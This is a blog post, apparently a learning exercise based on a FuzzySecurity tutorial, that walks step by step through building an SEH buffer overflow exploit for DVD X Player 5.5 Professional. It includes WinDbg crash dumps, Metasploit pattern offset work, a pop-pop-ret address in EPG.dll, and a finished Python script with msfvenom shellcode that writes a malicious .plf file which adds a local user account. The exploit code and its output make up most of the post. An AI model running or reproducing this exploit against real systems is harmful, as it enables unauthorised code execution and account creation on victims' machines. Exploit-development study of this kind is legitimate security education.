Before we get started, I must state clearly that this information is based on the guidance provided from fuzzysecurity.com website as shown in the references section.
For some folks reading my material may be easier, for others reading the material from Fuzy Security will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.
Similar to the FuzzySecurity blog post, we will be using DVDX player 5.5 Professional
First up, generate the player list file (".plf") file that allows us to overrun the buffer. The code below helps us to achieve this.
1 2 3 4 5 6 7 8 9 10 11 12 | def Exploit_Code(): malicious_file = 'SecurityNik.plf'; myBuffer = 'A' * 2000 fp = open(malicious_file,'w') fp.write(myBuffer) fp.close() print(' File {!s} created ... ' .format(malicious_file)) if __name__ == '__main__': Exploit_Code() |
Once the file is created, and fed to DVDX Player, with the attached debugger we get
1 2 3 4 5 6 7 | (488.164): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=042c0a60 edx=00000042 esi=042c0180 edi=6405362c eip=41414141 esp=0012f104 ebp=00effd80 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 41414141 ?? ??? |
From above we see our EIP has been overwritten by "41414141" which is basically our As.
If we take a look at our "!exchain", we see our Next SEH and SE Handler have been overwritten with "41414141"
1 2 3 | 0:000> !exchain 0012f24c: 41414141 Invalid exception stack at 41414141 |
Further confirming the above, if we take a look at the Thread Information Block (TEB), we see:
1 2 3 4 5 6 7 8 9 | 0:000> d fs:[0] 003b:00000000 4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L............... 003b:00000010 00 1e 00 00 00 00 00 00-00 e0 fd 7f 00 00 00 00 ................ 003b:00000020 88 04 00 00 64 01 00 00-00 00 00 00 00 00 00 00 ....d........... 003b:00000030 00 f0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000040 60 9c db e1 00 00 00 00-00 00 00 00 00 00 00 00 `............... 003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ |
When we dump the contents of address "0x0012f24c" we get:
1 2 3 4 5 6 7 8 9 | 0:000> d 0012f24c 0012f24c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f25c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f26c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f27c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f28c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f29c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f2ac 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0012f2bc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA |
At this point we see both the nSEH and the SE Handler has been overwritten.
Leveraging our trusted "pattern_create.rb" to generate a pattern of 2000 bytes, and providing it to the code we get.
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb --length 2000
and the modified code:
1 2 3 4 5 6 7 8 9 10 11 12 | def Exploit_Code(): malicious_file = 'SecurityNik.plf'; myBuffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co' fp = open(malicious_file,'w') fp.write(myBuffer) fp.close() print(' File {!s} created ... ' .format(malicious_file)) if __name__ == '__main__': Exploit_Code() |
When the new file is fed to DVDX we get:
1 2 3 4 5 6 7 | (46c.2a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=03e80a60 edx=00000042 esi=03e80180 edi=6405362c eip=37694136 esp=0012f104 ebp=00effd80 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 37694136 ?? ??? |
Looking at the "!exchain" output we get:
1 2 3 | 0:000> !exchain 0012f24c: 41347541 Invalid exception stack at 33754132 |
Looking at the ASCII value of "33754132" we get. Do remember the byte order of this value needs to be reorder. So the new value should be "0x32417533".
When this value is fed to WinDbg's ".formats" we see the following output
1 2 3 4 5 6 7 8 9 10 | 0:000> .formats 0x32417533 Evaluate expression: Hex: 32417533 Decimal: 843150643 Octal: 06220272463 Binary: 00110010 01000001 01110101 00110011 Chars: 2Au3 Time: Thu Sep 19 12:30:43 1996 Float: low 1.12607e-008 high 0 Double: 4.16572e-315 |
When "2Au3" is fed to Metasploit's "pattern_offset.rb" we get:
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb --length 2000 --query 2Au3
[*] Exact match at offset 608
At this point we can conclude our "Next SEH Record" is at offset 608. This means our SE Handler is at offset 612, since it is 4 bytes past the Next SEH.
Leveraging "findjmp2.exe" to identify a pop pop return sequence, we get:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | C:\Program Files\Aviosoft\DVD X Player 5.5 Professional>e:\findjump2.exe EPG.dll eax | findstr /i pop 0x61625534 pop eax - pop - retbis 0x61629759 pop eax - pop - ret 0x6162E7A6 pop eax - pop - ret 0x6162F5F2 pop eax - pop - ret 0x61632B3B pop eax - pop - retbis 0x61632DDA pop eax - pop - ret 0x616339BB pop eax - pop - retbis 0x616339DD pop eax - pop - retbis 0x61633F3B pop eax - pop - retbis 0x616347E5 pop eax - pop - ret 0x616348C9 pop eax - pop - retbis 0x61636E07 pop eax - pop - retbis 0x616384EE pop eax - pop - retbis 0x61638890 pop eax - pop - ret 0x6163A654 pop eax - pop - ret 0x6163AB3E pop eax - pop - ret 0x6163B482 pop eax - pop - ret 0x6163B9EE pop eax - pop - retbis 0x6163E206 pop eax - pop - ret 0x6163E54F pop eax - pop - retbis 0x61641D08 pop eax - pop - ret 0x61642270 pop eax - pop - retbis 0x61642A8E pop eax - pop - ret 0x61643B6B pop eax - pop - ret 0x61643BAD pop eax - pop - retbis 0x61643CCC pop eax - pop - retbis 0x61643D73 pop eax - pop - retbis 0x6164526D pop eax - pop - retbis |
Selecting the entry at "0x61629759" and finalizing the code we get:
Now that we have everything set, we will generate payload that will allow us add a user to the system. This user will be named "pwnd-user".
Let's first do a "net user" to verify this user does not exist.
1 2 3 4 5 6 7 8 | C:\>net user User accounts for \\SECURITYNIK-XP ------------------------------------------------------------------------------- Administrator Guest HelpAssistant SecurityNik SUPPORT_388945a0 The command completed successfully. |
Time for the final code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | """ This code is part of me learning exploit development in a Windows Environment Author: Nik Alleyne Author Blog: http://securitynik.blogspot.com Date: 2018-01-10 Exploit is for DVDX Player 5.5 Professional """ def Exploit_Code(): malicious_file = 'SecurityNik.plf'; #root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="net user pwnd-user Password1 /add" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D\x1A' --format c --iterations 1 > msfvenom_add_user.txt shellcode = ( "\xba\x2d\x45\x8d\x97\xd9\xcf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" "\x37\x31\x57\x14\x03\x57\x14\x83\xc7\x04\xcf\xb0\x71\x7f\x8d" "\x3b\x8a\x80\xf1\xb2\x6f\xb1\x31\xa0\xe4\xe2\x81\xa2\xa9\x0e" "\x6a\xe6\x59\x84\x1e\x2f\x6d\x2d\x94\x09\x40\xae\x84\x6a\xc3" "\x2c\xd6\xbe\x23\x0c\x19\xb3\x22\x49\x47\x3e\x76\x02\x0c\xed" "\x67\x27\x58\x2e\x03\x7b\x4d\x36\xf0\xcc\x6c\x17\xa7\x47\x37" "\xb7\x49\x8b\x4c\xfe\x51\xc8\x68\x48\xe9\x3a\x07\x4b\x3b\x73" "\xe8\xe0\x02\xbb\x1b\xf8\x43\x7c\xc3\x8f\xbd\x7e\x7e\x88\x79" "\xfc\xa4\x1d\x9a\xa6\x2f\x85\x46\x56\xfc\x50\x0c\x54\x49\x16" "\x4a\x79\x4c\xfb\xe0\x85\xc5\xfa\x26\x0c\x9d\xd8\xe2\x54\x46" "\x40\xb2\x30\x29\x7d\xa4\x9a\x96\xdb\xae\x37\xc3\x51\xed\x5d" "\x12\xe7\x8b\x10\x14\xf7\x93\x04\x7c\xc6\x18\xcb\xfb\xd7\xca" "\xaf\xf3\x9d\x57\x99\x9b\x7b\x02\x9b\xc6\x7b\xf8\xd8\xfe\xff" "\x09\xa1\x05\x1f\x78\xa4\x42\xa7\x90\xd4\xdb\x42\x97\x4b\xdc" "\x46\xf9\x0e\x56\x49\x73\xa2\xf3\xfb\x5b\x34\x8c\x95\xff\x99" "\x07\x19\x65\x90\xc7\x8d\x04\x27\x74\x59\xa8\xb5\x1e\x94\x16" "\x15\xbf\xb2\x32\x69") # Using pop pop return at address 0x61629759 in EPG.DLL myBuffer = 'A' * 608 + '\xeb\x06\x90\x90' + '\x59\x97\x62\x61' + '\x90' * 20 + shellcode fp = open(malicious_file,'w') fp.write(myBuffer) fp.close() print(' File {!s} created ... ' .format(malicious_file)) if __name__ == '__main__': Exploit_Code() |
Once the created file is fed to DVDX Player, the application showed a few errors. However, in the background our user "pwnd-user" was created.
1 2 3 4 5 6 7 8 | C:\>net user User accounts for \\SECURITYNIK-XP ------------------------------------------------------------------------------- Administrator Guest HelpAssistant pwnd-user SecurityNik SUPPORT_388945a0 The command completed successfully. |
At this point, the post can be completed. However, let's take a quick last past to get a better understanding of what transpired.
First up attach to the DVDX Player, then feed the file to the application. Once it crashes, we get:
1 2 3 4 5 6 7 | (288.7a0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=03f50a60 edx=00000042 esi=03f50180 edi=6405362c eip=41414141 esp=0012f104 ebp=00effd80 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 41414141 ?? ??? |
Next up, let's look at the TIB "fs:[0]" to see where the SE Chain starts:
1 2 3 4 5 6 7 8 9 | 0:000> d fs:[0] 003b:00000000 4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L............... 003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................ 003b:00000020 88 02 00 00 a0 07 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000030 00 b0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000040 b8 44 da e1 00 00 00 00-00 00 00 00 00 00 00 00 .D.............. 003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ |
From the above, we see the chain starts at "0x0012f24c"
Dumping the memory at this location, we get:
1 2 3 4 5 6 7 8 9 | 0:000> d 0012f24c 0012f24c eb 06 90 90 59 97 62 61-90 90 90 90 90 90 90 90 ....Y.ba........ 0012f25c 90 90 90 90 90 90 90 90-90 90 90 90 ba 2d 45 8d .............-E. 0012f26c 97 d9 cf d9 74 24 f4 5f-2b c9 b1 37 31 57 14 03 ....t$._+..71W.. 0012f27c 57 14 83 c7 04 cf b0 71-7f 8d 3b 8a 80 f1 b2 6f W......q..;....o 0012f28c b1 31 a0 e4 e2 81 a2 a9-0e 6a e6 59 84 1e 2f 6d .1.......j.Y../m 0012f29c 2d 94 09 40 ae 84 6a c3-2c d6 be 23 0c 19 b3 22 -..@..j.,..#..." 0012f2ac 49 47 3e 76 02 0c ed 67-27 58 2e 03 7b 4d 36 f0 IG>v...g'X..{M6. 0012f2bc cc 6c 17 a7 47 37 b7 49-8b 4c fe 51 c8 68 48 e9 .l..G7.I.L.Q.hH. |
From above we see our Next SEH overwritten with "0x909006eb". This is followed by our SEH handler being overwritten with "0x61629759". Next up we see our NOPs (0x90) followed by our shellcode.
We can also verify that Next SEH and SE Handler have been overwritten by leveraging the "!exchain" extension as show below:
1 2 3 4 5 | 0:000> !exchain 0012f24c: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll - EPG!Ordinal1+23919 (61629759) Invalid exception stack at 909006eb |
That's it for this post.
References:
https://www.fuzzysecurity.com/tutorials/expDev/3.html
No comments:
Post a Comment